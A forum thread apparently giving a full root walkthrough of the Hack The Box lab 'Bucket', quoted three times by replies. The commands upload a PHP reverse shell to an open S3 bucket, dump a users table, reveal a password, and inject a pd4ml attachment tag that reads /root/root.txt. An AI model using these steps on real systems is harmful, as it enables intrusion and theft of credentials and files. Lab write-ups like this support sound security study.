FLAG Bucket Commands to root
by y0ukn0wm3 - October 24, 2020 at 04:37 PM
#1
# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
Donate Me Hidden Content
You must register or login to view this content.
Reply
#2
Thank u so much ...

I was wracking my head over this one ... finally rooted !
Reply
#3
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:
# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]
Hi
How did you get aws configure values?
Reply
#4
(November 11, 2020 at 10:54 AM)Asur Wrote:
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:
# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]
Hi
How did you get aws configure values?

Check out amazon documentation on awscli because this are the default values that you get from reading the documentation.
Reply
#5
(October 24, 2020 at 04:37 PM)y0ukn0wm3 Wrote:
# install aws-cli
sudo apt-get install awscli

# configure aws 
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

# listing the available buckets in s3.bucket.htb
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request

# uploading files to the bucket in s3.bucket.htb
aws s3 cp shell.php s3://adserver/shell.php --endpoint-url http://s3.bucket.htb --no-sign-request

- Enumerating /shell/ in the http://s3.bucket.htb reveals the presence of dynamodb

# accessing the dynamodb, listing the available tables
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

# scanning the enumerated tables, (acessing the values in it)
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

- usernames and passwords are enumerated
- Uploading a php reverse shell and accessing it in http://s3.bucket.htb/shell.php
- now accessing the shell.php provides us with the reverse shell

# after obtaining a reverse shell as www-data
su roy :  n2vM-<_K_Q:.Aa2

- User.txt can be found in home directory of roy
- aws is installed in the system and an internal service port 8000 (web service) and port 4566 (aws service) 
- forward the port 8000 to local machine with chisel
- In the bucket-app/index.php the index.php shows another communcation to the internal service, a new table name alerts whichi is accessed with a post request with the values data

# create a new dynamodb table
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

# create a table and insert the values as requested by the index.php
/usr/bin/aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

- Now after inserting everything needed, make a curl POST

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

- Check out the http://127.0.0.1:8000/files in your browser to obtain the root.txt

Donate me if you like, 
[Hidden Content]

Hi, when i try aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request  , it said could not connect to endpoint http://s3.bucket.htb .... Any thoughts?
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG Rooted APT in 3 Commands r0xb0ss 2 284 Yesterday at 01:56 PM
Last Post: esh_din1
TUTORIAL Laboratory.htb id_rsa for root and the root key ARhOmOuTEd 7 1,617 November 27, 2020 at 10:21 PM
Last Post: ARhOmOuTEd
TUTORIAL Bucket Discussion Ro0ted 85 14,380 November 15, 2020 at 11:47 AM
Last Post: JackThePippers

 Users browsing this thread: 1 Guest(s)